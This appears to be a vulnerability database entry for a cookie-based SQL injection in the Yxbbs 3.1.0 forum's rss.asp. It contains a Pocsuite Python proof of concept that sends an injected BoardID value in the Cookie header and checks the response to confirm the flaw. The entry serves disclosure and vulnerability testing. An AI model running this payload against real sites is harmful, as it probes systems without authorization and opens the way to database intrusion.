Yxbbs论坛系统 3.1.0 Rss.Asp文件存在cookie注射漏洞

🗓️ 02 Jul 2010 00:00:00Reported by RootType

Yxbbs论坛系统 3.1.0 Rss.Asp文件存在cookie注射漏洞. 防注入功能, 严格过滤cookie缺失导致BoardID参数可被注


                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse

class TestPOC(POCBase):
    vulID = '19900'  # ssvid
    version = '1.0'
    author = ['Bin']
    vulDate = '2010-07-02'
    createDate = '2015-12-04'
    updateDate = '2015-12-04'
    references = ['http://www.sebug.net/vuldb/ssvid-19900']
    name = 'Yxbbs论坛系统 3.1.0 Rss.Asp文件存在cookie注射漏洞'
    appPowerLink = 'http://www.yimxu.com/'
    appName = 'Yxbbs'
    appVersion = '3.1.0'
    vulType = 'SQL injection'
    desc = '''
         Yxbbs论坛3.1.0版本虽然有防注入功能，但是没有严格过滤cookie,导致rss.asp文件中的
         BoardID参数可以cookie注入。 
    '''
    samples = ['http://192.168.1.100']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/rss.asp')
        payload = "BoardID=2%20order%20by%201%16" #用%16截断access
        head = {
            'Cookie': payload
        }
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200 and '该版本为认证版面' not in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

02 Jul 2010 00:00Current

7.1High risk

Vulners AI Score7.1